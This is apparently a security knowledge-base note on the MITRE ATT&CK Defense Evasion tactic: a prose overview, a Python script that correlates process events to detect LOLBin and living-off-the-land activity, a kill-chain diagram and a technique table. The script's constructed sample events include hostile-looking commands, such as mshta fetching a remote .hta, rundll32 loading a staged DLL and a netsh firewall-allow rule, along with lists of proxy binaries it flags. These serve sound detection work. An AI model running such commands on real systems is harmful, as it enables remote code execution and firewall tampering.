# TA0005 — Defense Evasion
## Description
Defense Evasion is the tactic with the **largest number of techniques** in the MITRE ATT&CK Enterprise framework, a reflection of how central it is to modern adversary operations. The adversary needs to stay hidden not only at the point of entry but throughout the whole operation. Every active security control (EDR, antivirus, SIEM, IDS) is an obstacle to get around.
Evasion approaches include **code obfuscation** ([[t1027-obfuscated-files|T1027]]), **process masquerading** ([[t1036-masquerading|T1036]]), **disabling security tools** ([[t1562-001-disable-tools|T1562.001]]), **removing evidence** ([[t1070-indicator-removal|T1070]]) and **execution through legitimate system binaries** ([[t1218-system-binary-proxy-execution|T1218]]). Adversaries such as [[g0016-apt29|APT29]] combine several evasion techniques at the same time, which makes detection by static rules practically impossible.
Living Off the Land (LOTL), that is, using the OS's own legitimate tools for malicious ends, is the default evasion strategy of advanced nation-state groups such as [[g1017-volt-typhoon|Volt Typhoon]], which operates exclusively with tools like wmic, netsh and ntdsutil to avoid leaving any artifact an antivirus could detect.
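The description above argues that static, per-event rules miss adversaries who chain several evasion techniques and live off the land, so the practical check is correlation: score each process-creation event against the techniques in this note's table and aggregate per host inside a time window. The script below is an added example (not part of the original note, and not MITRE's or any vendor's code) that runs over constructed Sysmon-style events; the LOLBin subset, parent-process baseline, weights and thresholds are assumptions to tune for your environment.

```python
from datetime import datetime, timedelta

# Binaries the table on this page files under T1218, keyed by image name
# (assumed subset; extend it from the T1218.* rows).
PROXY_BINARIES = {
    "cmstp.exe": "T1218.003", "installutil.exe": "T1218.004",
    "mshta.exe": "T1218.005", "msiexec.exe": "T1218.007",
    "regsvr32.exe": "T1218.010", "rundll32.exe": "T1218.011",
}
# Native admin tools the description attributes to Volt Typhoon's LOTL tradecraft.
LOTL_ADMIN_TOOLS = {"wmic.exe", "netsh.exe", "ntdsutil.exe"}
# Parents that rarely launch the binaries above legitimately (assumed baseline,
# tune it against your own environment).
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}
FIREWALL_VERBS = {"set", "add", "delete"}


def image_name(path):
    """Lowercase file name of a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Score one process-creation event: returns (score, technique IDs, reasons)."""
    image, parent = image_name(event["image"]), image_name(event["parent_image"])
    tokens = event["command_line"].lower().split()
    score, techniques, reasons = 0, set(), []
    if image in PROXY_BINARIES:
        score += 2
        techniques.add(PROXY_BINARIES[image])
        reasons.append("proxy execution via " + image)
        if any("://" in t for t in tokens):  # remote content handed to a system binary
            score += 2
            reasons.append("remote URL on the command line")
    if image == "netsh.exe" and any("firewall" in t for t in tokens) and FIREWALL_VERBS & set(tokens):
        score += 3  # T1562.004 Disable or Modify System Firewall
        techniques.add("T1562.004")
        reasons.append("firewall rule change via netsh")
    elif image in LOTL_ADMIN_TOOLS:
        score += 1  # routine on its own, meaningful only in aggregate
        reasons.append("native admin tool " + image)
    if score and parent in UNUSUAL_PARENTS:
        score += 2
        reasons.append("spawned by " + parent)
    return score, techniques, reasons


def correlate(events, window_minutes=10, min_techniques=2, min_score=4):
    """Cluster flagged events per host (gap <= window) and alert on the whole cluster."""
    window = timedelta(minutes=window_minutes)
    flagged = []
    for e in events:
        score, techniques, reasons = classify(e)
        if score:
            flagged.append((e["host"], datetime.fromisoformat(e["time"]), score, techniques, reasons))
    flagged.sort(key=lambda f: (f[0], f[1]))
    alerts, cluster = [], []

    def flush():
        techs = set().union(*(c[3] for c in cluster))
        total = sum(c[2] for c in cluster)
        if len(techs) >= min_techniques or total >= min_score:
            alerts.append({"host": cluster[0][0], "start": cluster[0][1].isoformat(),
                           "end": cluster[-1][1].isoformat(), "score": total,
                           "techniques": sorted(techs),
                           "reasons": [r for c in cluster for r in c[4]]})
        cluster.clear()

    for item in flagged:
        if cluster and (item[0] != cluster[-1][0] or item[1] - cluster[-1][1] > window):
            flush()
        cluster.append(item)
    if cluster:
        flush()
    return alerts


def ev(host, time, parent, image, cmd):
    return {"host": host, "time": time, "parent_image": parent, "image": image, "command_line": cmd}

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    ev("ws-finance-07", "2024-05-01T10:00:05", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
       r"C:\Windows\System32\mshta.exe", "mshta.exe https://cdn.example.invalid/update.hta"),
    ev("ws-finance-07", "2024-05-01T10:01:40", r"C:\Windows\System32\mshta.exe",
       r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Users\Public\stage.dll,Run"),
    ev("srv-file-02", "2024-05-01T09:00:00", r"C:\Windows\System32\cmd.exe",
       r"C:\Windows\System32\netsh.exe", "netsh interface show interface"),
    ev("srv-file-02", "2024-05-01T09:03:10", r"C:\Windows\System32\cmd.exe",
       r"C:\Windows\System32\wbem\WMIC.exe", "wmic process list brief"),
    ev("srv-file-02", "2024-05-01T09:05:30", r"C:\Windows\System32\cmd.exe",
       r"C:\Windows\System32\netsh.exe",
       r"netsh advfirewall firewall add rule name=svc dir=in action=allow program=C:\Users\Public\svc.exe"),
    ev("ws-hr-12", "2024-05-01T08:00:00", r"C:\Windows\explorer.exe",
       r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i C:\Installers\app.msi /qn"),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

With the default window the lone msiexec install on ws-hr-12 stays silent, while the Office-spawned mshta chain and the netsh/wmic burst ending in a firewall change each produce one host-level alert.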
## Position in the Kill Chain
```mermaid
graph TB
R["Reconhecimento"]:::inactive --> RD["Desenvolvimento<br/>de Recursos"]:::inactive
RD --> IA["Acesso Inicial"]:::inactive
IA --> EX["Execução"]:::inactive
EX --> PE["Persistência"]:::inactive
PE --> PR["Esc. Privilégios"]:::inactive
PR --> DE["🛡️ Evasão de Defesas"]:::active
DE --> CA["Acesso a<br/>Credenciais"]:::inactive
CA --> DI["Descoberta"]:::inactive
DI --> LM["Mov. Lateral"]:::inactive
LM --> CO["Coleta"]:::inactive
CO --> C2["Comando e<br/>Controle"]:::inactive
C2 --> EXF["Exfiltração"]:::inactive
EXF --> IM["Impacto"]:::inactive
classDef active fill:#e74c3c,color:#fff,stroke:#c0392b,stroke-width:3px
classDef inactive fill:#2c3e50,color:#95a5a6,stroke:#1a252f
```
## Techniques of this Tactic in the Vault
%%
```dataview
TABLE WITHOUT ID link(file.link, title) AS "Nota", mitre-id AS "ID", title AS "Técnica", platforms AS "Plataformas"
FROM "ttp/techniques"
WHERE contains(mitre-tactic, "Defense Evasion")
SORT mitre-id ASC
```
%%
| Note | ID | Technique | Platforms |
| -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------- | --------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| [[t1006-direct-volume-access\|T1006 - Direct Volume Access]] | T1006 | T1006 - Direct Volume Access | <ul><li>Network Devices</li><li>Windows</li></ul> |
| [[t1014-rootkit\|T1014 - Rootkit]] | T1014 | T1014 - Rootkit | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1027-obfuscated-files-or-information\|T1027 - Obfuscated Files or Information]] | T1027 | T1027 - Obfuscated Files or Information | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Windows</li></ul> |
| [[t1027-obfuscated-files\|T1027 - Obfuscated Files or Information]] | T1027 | T1027 - Obfuscated Files or Information | <ul><li>Windows</li><li>Linux</li><li>macOS</li></ul> |
| [[t1027-001-binary-padding\|T1027.001 - Binary Padding]] | T1027.001 | T1027.001 - Binary Padding | <ul><li>Linux</li><li>Windows</li><li>macOS</li></ul> |
| [[t1027-002-software-packing\|T1027.002 - Software Packing]] | T1027.002 | T1027.002 - Software Packing | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1027-003-steganography\|T1027.003 - Steganography]] | T1027.003 | T1027.003 - Steganography | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1027-004-compile-after-delivery\|T1027.004 - Compile After Delivery]] | T1027.004 | T1027.004 - Compile After Delivery | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1027-005-indicator-removal-from-tools\|T1027.005 - Indicator Removal from Tools]] | T1027.005 | T1027.005 - Indicator Removal from Tools | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1027-006-html-smuggling\|T1027.006 - HTML Smuggling]] | T1027.006 | T1027.006 - HTML Smuggling | <ul><li>Windows</li><li>Linux</li><li>macOS</li></ul> |
| [[t1027-007-dynamic-api-resolution\|T1027.007 - Dynamic API Resolution]] | T1027.007 | T1027.007 - Dynamic API Resolution | <ul><li>Windows</li></ul> |
| [[t1027-008-stripped-payloads\|T1027.008 - Stripped Payloads]] | T1027.008 | T1027.008 - Stripped Payloads | <ul><li>macOS</li><li>Linux</li><li>Windows</li><li>Network Devices</li></ul> |
| [[t1027-009-embedded-payloads\|T1027.009 - Embedded Payloads]] | T1027.009 | T1027.009 - Embedded Payloads | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1027-010-command-obfuscation\|T1027.010 - Command Obfuscation]] | T1027.010 | T1027.010 - Command Obfuscation | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1027-011-fileless-storage\|T1027.011 - Fileless Storage]] | T1027.011 | T1027.011 - Fileless Storage | <ul><li>Windows</li><li>Linux</li></ul> |
| [[t1027-012-lnk-icon-smuggling\|T1027.012 - LNK Icon Smuggling]] | T1027.012 | T1027.012 - LNK Icon Smuggling | <ul><li>Windows</li></ul> |
| [[t1027-013-encryptedencoded-file\|T1027.013 - Encrypted/Encoded File]] | T1027.013 | T1027.013 - Encrypted/Encoded File | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1027-014-polymorphic-code\|T1027.014 - Polymorphic Code]] | T1027.014 | T1027.014 - Polymorphic Code | <ul><li>Windows</li><li>macOS</li><li>Linux</li></ul> |
| [[t1027-015-compression\|T1027.015 - Compression]] | T1027.015 | T1027.015 - Compression | <ul><li>Linux</li><li>Windows</li><li>macOS</li></ul> |
| [[t1027-016-junk-code-insertion\|T1027.016 - Junk Code Insertion]] | T1027.016 | T1027.016 - Junk Code Insertion | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1027-017-svg-smuggling\|T1027.017 - SVG Smuggling]] | T1027.017 | T1027.017 - SVG Smuggling | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1036-masquerading\|T1036 - Masquerading]] | T1036 | T1036 - Masquerading | <ul><li>Containers</li><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1036-001-invalid-code-signature\|T1036.001 - Invalid Code Signature]] | T1036.001 | T1036.001 - Invalid Code Signature | <ul><li>Windows</li><li>macOS</li></ul> |
| [[t1036-002-right-to-left-override\|T1036.002 - Right-to-Left Override]] | T1036.002 | T1036.002 - Right-to-Left Override | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1036-003-rename-legitimate-utilities\|T1036.003 - Rename Legitimate Utilities]] | T1036.003 | T1036.003 - Rename Legitimate Utilities | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1036-004-masquerade-task-or-service\|T1036.004 - Masquerade Task or Service]] | T1036.004 | T1036.004 - Masquerade Task or Service | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1036-005-match-legitimate-resource-name-or-location\|T1036.005 - Match Legitimate Resource Name or Location]] | T1036.005 | T1036.005 - Match Legitimate Resource Name or Location | <ul><li>Containers</li><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1036-006-space-after-filename\|T1036.006 - Space after Filename]] | T1036.006 | T1036.006 - Space after Filename | <ul><li>Linux</li><li>macOS</li></ul> |
| [[t1036-007-double-file-extension\|T1036.007 - Double File Extension]] | T1036.007 | T1036.007 - Double File Extension | <ul><li>Windows</li></ul> |
| [[t1036-008-masquerade-file-type\|T1036.008 - Masquerade File Type]] | T1036.008 | T1036.008 - Masquerade File Type | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1036-009-break-process-trees\|T1036.009 - Break Process Trees]] | T1036.009 | T1036.009 - Break Process Trees | <ul><li>Linux</li><li>macOS</li></ul> |
| [[t1036-010-masquerade-account-name\|T1036.010 - Masquerade Account Name]] | T1036.010 | T1036.010 - Masquerade Account Name | <ul><li>Linux</li><li>macOS</li><li>Windows</li><li>SaaS</li><li>IaaS</li><li>Containers</li><li>Office Suite</li><li>Identity Provider</li></ul> |
| [[t1036-011-overwrite-process-arguments\|T1036.011 - Overwrite Process Arguments]] | T1036.011 | T1036.011 - Overwrite Process Arguments | <ul><li>Linux</li></ul> |
| [[t1036-012-browser-fingerprint\|T1036.012 - Browser Fingerprint]] | T1036.012 | T1036.012 - Browser Fingerprint | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1055-process-injection\|T1055 - Process Injection]] | T1055 | T1055 - Process Injection | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1055-001-dynamic-link-library-injection\|T1055.001 - Dynamic-link Library Injection]] | T1055.001 | T1055.001 - Dynamic-link Library Injection | <ul><li>Windows</li></ul> |
| [[t1055-002-portable-executable-injection\|T1055.002 - Portable Executable Injection]] | T1055.002 | T1055.002 - Portable Executable Injection | <ul><li>Windows</li></ul> |
| [[t1055-003-thread-execution-hijacking\|T1055.003 - Thread Execution Hijacking]] | T1055.003 | T1055.003 - Thread Execution Hijacking | <ul><li>Windows</li></ul> |
| [[t1055-004-asynchronous-procedure-call\|T1055.004 - Asynchronous Procedure Call]] | T1055.004 | T1055.004 - Asynchronous Procedure Call | <ul><li>Windows</li></ul> |
| [[t1055-005-thread-local-storage\|T1055.005 - Thread Local Storage]] | T1055.005 | T1055.005 - Thread Local Storage | <ul><li>Windows</li></ul> |
| [[t1055-008-ptrace-system-calls\|T1055.008 - Ptrace System Calls]] | T1055.008 | T1055.008 - Ptrace System Calls | <ul><li>Linux</li></ul> |
| [[t1055-009-proc-memory\|T1055.009 - Proc Memory]] | T1055.009 | T1055.009 - Proc Memory | <ul><li>Linux</li></ul> |
| [[t1055-011-extra-window-memory-injection\|T1055.011 - Extra Window Memory Injection]] | T1055.011 | T1055.011 - Extra Window Memory Injection | <ul><li>Windows</li></ul> |
| [[t1055-012-process-hollowing\|T1055.012 - Process Hollowing]] | T1055.012 | T1055.012 - Process Hollowing | <ul><li>Windows</li></ul> |
| [[t1055-013-process-doppelgnging\|T1055.013 - Process Doppelgänging]] | T1055.013 | T1055.013 - Process Doppelgänging | <ul><li>Windows</li></ul> |
| [[t1055-014-vdso-hijacking\|T1055.014 - VDSO Hijacking]] | T1055.014 | T1055.014 - VDSO Hijacking | <ul><li>Linux</li></ul> |
| [[t1055-015-listplanting\|T1055.015 - ListPlanting]] | T1055.015 | T1055.015 - ListPlanting | <ul><li>Windows</li></ul> |
| [[t1070-indicator-removal\|T1070 - Indicator Removal]] | T1070 | T1070 - Indicator Removal | <ul><li>Containers</li><li>ESXi</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Office Suite</li><li>Windows</li></ul> |
| [[t1070-001-clear-windows-event-logs\|T1070.001 - Clear Windows Event Logs]] | T1070.001 | T1070.001 - Clear Windows Event Logs | <ul><li>Windows</li></ul> |
| [[t1070-002-clear-linux-or-mac-system-logs\|T1070.002 - Clear Linux or Mac System Logs]] | T1070.002 | T1070.002 - Clear Linux or Mac System Logs | <ul><li>Linux</li><li>macOS</li></ul> |
| [[t1070-003-clear-command-history\|T1070.003 - Clear Command History]] | T1070.003 | T1070.003 - Clear Command History | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Windows</li></ul> |
| [[t1070-004-file-deletion\|T1070.004 - File Deletion]] | T1070.004 | T1070.004 - File Deletion | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1070-005-network-share-connection-removal\|T1070.005 - Network Share Connection Removal]] | T1070.005 | T1070.005 - Network Share Connection Removal | <ul><li>Windows</li></ul> |
| [[t1070-006-timestomp\|T1070.006 - Timestomp]] | T1070.006 | T1070.006 - Timestomp | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1070-007-clear-network-connection-history-and-configurations\|T1070.007 - Clear Network Connection History and Configurations]] | T1070.007 | T1070.007 - Clear Network Connection History and Configurations | <ul><li>Linux</li><li>macOS</li><li>Windows</li><li>Network Devices</li></ul> |
| [[t1070-008-clear-mailbox-data\|T1070.008 - Clear Mailbox Data]] | T1070.008 | T1070.008 - Clear Mailbox Data | <ul><li>Linux</li><li>macOS</li><li>Office Suite</li><li>Windows</li></ul> |
| [[t1070-009-clear-persistence\|T1070.009 - Clear Persistence]] | T1070.009 | T1070.009 - Clear Persistence | <ul><li>ESXi</li><li>Linux</li><li>Windows</li><li>macOS</li></ul> |
| [[t1070-010-relocate-malware\|T1070.010 - Relocate Malware]] | T1070.010 | T1070.010 - Relocate Malware | <ul><li>Linux</li><li>macOS</li><li>Windows</li><li>Network Devices</li></ul> |
| [[t1078-valid-accounts\|T1078 - Valid Accounts]] | T1078 | T1078 - Valid Accounts | <ul><li>Containers</li><li>ESXi</li><li>IaaS</li><li>Identity Provider</li><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Office Suite</li><li>SaaS</li><li>Windows</li></ul> |
| [[t1078-001-default-accounts\|T1078.001 - Default Accounts]] | T1078.001 | T1078.001 - Default Accounts | <ul><li>Windows</li><li>SaaS</li><li>IaaS</li><li>Linux</li><li>macOS</li><li>Containers</li><li>Network Devices</li><li>ESXi</li><li>Office Suite</li><li>Identity Provider</li></ul> |
| [[t1078-002-domain-accounts\|T1078.002 - Domain Accounts]] | T1078.002 | T1078.002 - Domain Accounts | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1078-003-local-accounts\|T1078.003 - Local Accounts]] | T1078.003 | T1078.003 - Local Accounts | <ul><li>Linux</li><li>macOS</li><li>Windows</li><li>Containers</li><li>Network Devices</li><li>ESXi</li></ul> |
| [[t1078-004-cloud-accounts\|T1078.004 - Cloud Accounts]] | T1078.004 | T1078.004 - Cloud Accounts | <ul><li>IaaS</li><li>Identity Provider</li><li>Office Suite</li><li>SaaS</li></ul> |
| [[t1112-modify-registry\|T1112 - Modify Registry]] | T1112 | T1112 - Modify Registry | <ul><li>Windows</li></ul> |
| [[t1127-trusted-developer-utilities-proxy-execution\|T1127 - Trusted Developer Utilities Proxy Execution]] | T1127 | T1127 - Trusted Developer Utilities Proxy Execution | <ul><li>Windows</li></ul> |
| [[t1127-001-msbuild\|T1127.001 - MSBuild]] | T1127.001 | T1127.001 - MSBuild | <ul><li>Windows</li></ul> |
| [[t1127-002-clickonce\|T1127.002 - ClickOnce]] | T1127.002 | T1127.002 - ClickOnce | <ul><li>Windows</li></ul> |
| [[t1127-003-jamplus\|T1127.003 - JamPlus]] | T1127.003 | T1127.003 - JamPlus | <ul><li>Windows</li></ul> |
| [[t1134-access-token-manipulation\|T1134 - Access Token Manipulation]] | T1134 | T1134 - Access Token Manipulation | <ul><li>Windows</li></ul> |
| [[t1134-001-token-impersonationtheft\|T1134.001 - Token Impersonation/Theft]] | T1134.001 | T1134.001 - Token Impersonation/Theft | <ul><li>Windows</li></ul> |
| [[t1134-002-create-process-with-token\|T1134.002 - Create Process with Token]] | T1134.002 | T1134.002 - Create Process with Token | <ul><li>Windows</li></ul> |
| [[t1134-003-make-and-impersonate-token\|T1134.003 - Make and Impersonate Token]] | T1134.003 | T1134.003 - Make and Impersonate Token | <ul><li>Windows</li></ul> |
| [[t1134-004-parent-pid-spoofing\|T1134.004 - Parent PID Spoofing]] | T1134.004 | T1134.004 - Parent PID Spoofing | <ul><li>Windows</li></ul> |
| [[t1134-005-sid-history-injection\|T1134.005 - SID-History Injection]] | T1134.005 | T1134.005 - SID-History Injection | <ul><li>Windows</li></ul> |
| [[t1140-deobfuscate-decode\|T1140 - Deobfuscate/Decode Files or Information]] | T1140 | T1140 - Deobfuscate/Decode Files or Information | <ul><li>Windows</li><li>macOS</li><li>Linux</li></ul> |
| [[t1140-deobfuscatedecode-files-or-information\|T1140 - Deobfuscate/Decode Files or Information]] | T1140 | T1140 - Deobfuscate/Decode Files or Information | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1197-bits-jobs\|T1197 - BITS Jobs]] | T1197 | T1197 - BITS Jobs | <ul><li>Windows</li></ul> |
| [[t1202-indirect-command-execution\|T1202 - Indirect Command Execution]] | T1202 | T1202 - Indirect Command Execution | <ul><li>Windows</li></ul> |
| [[t1205-traffic-signaling\|T1205 - Traffic Signaling]] | T1205 | T1205 - Traffic Signaling | <ul><li>Linux</li><li>macOS</li><li>Network Devices</li><li>Windows</li></ul> |
| [[t1205-001-port-knocking\|T1205.001 - Port Knocking]] | T1205.001 | T1205.001 - Port Knocking | <ul><li>Linux</li><li>macOS</li><li>Windows</li><li>Network Devices</li></ul> |
| [[t1205-002-socket-filters\|T1205.002 - Socket Filters]] | T1205.002 | T1205.002 - Socket Filters | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1207-rogue-domain-controller\|T1207 - Rogue Domain Controller]] | T1207 | T1207 - Rogue Domain Controller | <ul><li>Windows</li></ul> |
| [[t1211-exploitation-for-defense-evasion\|T1211 - Exploitation for Defense Evasion]] | T1211 | T1211 - Exploitation for Defense Evasion | <ul><li>Linux</li><li>Windows</li><li>macOS</li><li>SaaS</li><li>IaaS</li></ul> |
| [[t1216-system-script-proxy-execution\|T1216 - System Script Proxy Execution]] | T1216 | T1216 - System Script Proxy Execution | <ul><li>Windows</li></ul> |
| [[t1216-001-pubprn\|T1216.001 - PubPrn]] | T1216.001 | T1216.001 - PubPrn | <ul><li>Windows</li></ul> |
| [[t1216-002-syncappvpublishingserver\|T1216.002 - SyncAppvPublishingServer]] | T1216.002 | T1216.002 - SyncAppvPublishingServer | <ul><li>Windows</li></ul> |
| [[t1218-system-binary-proxy-execution\|T1218 - System Binary Proxy Execution]] | T1218 | T1218 - System Binary Proxy Execution | <ul><li>Windows</li><li>Linux</li><li>macOS</li></ul> |
| [[t1218-001-compiled-html-file\|T1218.001 - Compiled HTML File]] | T1218.001 | T1218.001 - Compiled HTML File | <ul><li>Windows</li></ul> |
| [[t1218-002-control-panel\|T1218.002 - Control Panel]] | T1218.002 | T1218.002 - Control Panel | <ul><li>Windows</li></ul> |
| [[t1218-003-cmstp\|T1218.003 - CMSTP]] | T1218.003 | T1218.003 - CMSTP | <ul><li>Windows</li></ul> |
| [[t1218-004-installutil\|T1218.004 - InstallUtil]] | T1218.004 | T1218.004 - InstallUtil | <ul><li>Windows</li></ul> |
| [[t1218-005-mshta\|T1218.005 - Mshta]] | T1218.005 | T1218.005 - Mshta | <ul><li>Windows</li></ul> |
| [[t1218-007-msiexec\|T1218.007 - Msiexec]] | T1218.007 | T1218.007 - Msiexec | <ul><li>Windows</li></ul> |
| [[t1218-008-odbcconf\|T1218.008 - Odbcconf]] | T1218.008 | T1218.008 - Odbcconf | <ul><li>Windows</li></ul> |
| [[t1218-009-regsvcsregasm\|T1218.009 - Regsvcs/Regasm]] | T1218.009 | T1218.009 - Regsvcs/Regasm | <ul><li>Windows</li></ul> |
| [[t1218-010-regsvr32\|T1218.010 - Regsvr32]] | T1218.010 | T1218.010 - Regsvr32 | <ul><li>Windows</li></ul> |
| [[t1218-011-rundll32\|T1218.011 - Rundll32]] | T1218.011 | T1218.011 - Rundll32 | <ul><li>Windows</li></ul> |
| [[t1218-012-verclsid\|T1218.012 - Verclsid]] | T1218.012 | T1218.012 - Verclsid | <ul><li>Windows</li></ul> |
| [[t1218-013-mavinject\|T1218.013 - Mavinject]] | T1218.013 | T1218.013 - Mavinject | <ul><li>Windows</li></ul> |
| [[t1218-014-mmc\|T1218.014 - MMC]] | T1218.014 | T1218.014 - MMC | <ul><li>Windows</li></ul> |
| [[t1218-015-electron-applications\|T1218.015 - Electron Applications]] | T1218.015 | T1218.015 - Electron Applications | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1220-xsl-script-processing\|T1220 - XSL Script Processing]] | T1220 | T1220 - XSL Script Processing | <ul><li>Windows</li></ul> |
| [[t1221-template-injection\|T1221 - Template Injection]] | T1221 | T1221 - Template Injection | <ul><li>Windows</li></ul> |
| [[t1222-file-and-directory-permissions-modification\|T1222 - File and Directory Permissions Modification]] | T1222 | T1222 - File and Directory Permissions Modification | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1222-001-windows-file-and-directory-permissions-modification\|T1222.001 - Windows File and Directory Permissions Modification]] | T1222.001 | T1222.001 - Windows File and Directory Permissions Modification | <ul><li>Windows</li></ul> |
| [[t1222-002-linux-and-mac-file-and-directory-permissions-modification\|T1222.002 - Linux and Mac File and Directory Permissions Modification]] | T1222.002 | T1222.002 - Linux and Mac File and Directory Permissions Modification | <ul><li>macOS</li><li>Linux</li></ul> |
| [[t1406-obfuscated-files-or-information\|T1406 - Obfuscated Files or Information]] | T1406 | T1406 - Obfuscated Files or Information | <ul><li>Android</li><li>iOS</li></ul> |
| [[t1407-download-new-code-at-runtime\|T1407 - Download New Code at Runtime]] | T1407 | T1407 - Download New Code at Runtime | <ul><li>Android</li><li>iOS</li></ul> |
| [[t1480-execution-guardrails\|T1480 - Execution Guardrails]] | T1480 | T1480 - Execution Guardrails | <ul><li>ESXi</li><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1480-001-environmental-keying\|T1480.001 - Environmental Keying]] | T1480.001 | T1480.001 - Environmental Keying | <ul><li>Linux</li><li>Windows</li><li>macOS</li></ul> |
| [[t1480-002-mutual-exclusion\|T1480.002 - Mutual Exclusion]] | T1480.002 | T1480.002 - Mutual Exclusion | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1484-domain-or-tenant-policy-modification\|T1484 - Domain or Tenant Policy Modification]] | T1484 | T1484 - Domain or Tenant Policy Modification | <ul><li>Windows</li><li>Identity Provider</li></ul> |
| [[t1484-001-group-policy-modification\|T1484.001 - Group Policy Modification]] | T1484.001 | T1484.001 - Group Policy Modification | <ul><li>Windows</li></ul> |
| [[t1484-002-trust-modification\|T1484.002 - Trust Modification]] | T1484.002 | T1484.002 - Trust Modification | <ul><li>Identity Provider</li><li>Windows</li></ul> |
| [[t1497-virtualization-evasion\|T1497 - Virtualization/Sandbox Evasion]] | T1497 | T1497 - Virtualization/Sandbox Evasion | <ul><li>Windows</li><li>macOS</li><li>Linux</li></ul> |
| [[t1497-virtualizationsandbox-evasion\|T1497 - Virtualization/Sandbox Evasion]] | T1497 | T1497 - Virtualization/Sandbox Evasion | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1497-001-system-checks\|T1497.001 - System Checks]] | T1497.001 | T1497.001 - System Checks | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1497-002-user-activity-based-checks\|T1497.002 - User Activity Based Checks]] | T1497.002 | T1497.002 - User Activity Based Checks | <ul><li>Linux</li><li>Windows</li><li>macOS</li></ul> |
| [[t1497-003-time-based-checks\|T1497.003 - Time Based Checks]] | T1497.003 | T1497.003 - Time Based Checks | <ul><li>Linux</li><li>macOS</li><li>Windows</li></ul> |
| [[t1508-suppress-application-icon\|T1508 - Suppress Application Icon]] | T1508 | T1508 - Suppress Application Icon | <ul><li>Android</li></ul> |
| [[t1535-unusedunsupported-cloud-regions\|T1535 - Unused/Unsupported Cloud Regions]] | T1535 | T1535 - Unused/Unsupported Cloud Regions | <ul><li>IaaS</li></ul> |
| [[t1542-pre-os-boot\|T1542 - Pre-OS Boot]] | T1542 | T1542 - Pre-OS Boot | <ul><li>Linux</li><li>Network Devices</li><li>Windows</li><li>macOS</li></ul> |
| [[t1542-004-rommonkit\|T1542.004 - ROMMONkit]] | T1542.004 | T1542.004 - ROMMONkit | <ul><li>Network Devices</li></ul> |
| [[t1542-005-tftp-boot\|T1542.005 - TFTP Boot]] | T1542.005 | T1542.005 - TFTP Boot | <ul><li>Network Devices</li></ul> |
| [[t1548-006-tcc-manipulation\|T1548.006 - TCC Manipulation]] | T1548.006 | T1548.006 - TCC Manipulation | <ul><li>macOS</li></ul> |
| [[t1550-use-alternate-authentication-material\|T1550 - Use Alternate Authentication Material]] | T1550 | T1550 - Use Alternate Authentication Material | <ul><li>Windows</li><li>SaaS</li><li>IaaS</li><li>Containers</li><li>Identity Provider</li><li>Office Suite</li><li>Linux</li></ul> |
| [[t1550-001-app-access-token\|T1550.001 - Use Alternate Authentication Material: Application Access Token]] | T1550.001 | T1550.001 - Use Alternate Authentication Material: Application Access Token | <ul><li>SaaS</li><li>Office 365</li><li>Google Workspace</li><li>Azure AD</li></ul> |
| [[t1550-001-application-access-token\|T1550.001 - Application Access Token]] | T1550.001 | T1550.001 - Application Access Token | <ul><li>SaaS</li><li>Containers</li><li>IaaS</li><li>Office Suite</li><li>Identity Provider</li></ul> |
| [[t1550-002-pass-the-hash\|T1550.002 - Pass the Hash]] | T1550.002 | T1550.002 - Pass the Hash | <ul><li>Windows</li></ul> |
| [[t1550-003-pass-the-ticket\|T1550.003 - Pass the Ticket]] | T1550.003 | T1550.003 - Pass the Ticket | <ul><li>Windows</li></ul> |
| [[t1550-004-web-session-cookie\|T1550.004 - Web Session Cookie]] | T1550.004 | T1550.004 - Web Session Cookie | <ul><li>SaaS</li><li>IaaS</li><li>Office Suite</li></ul> |
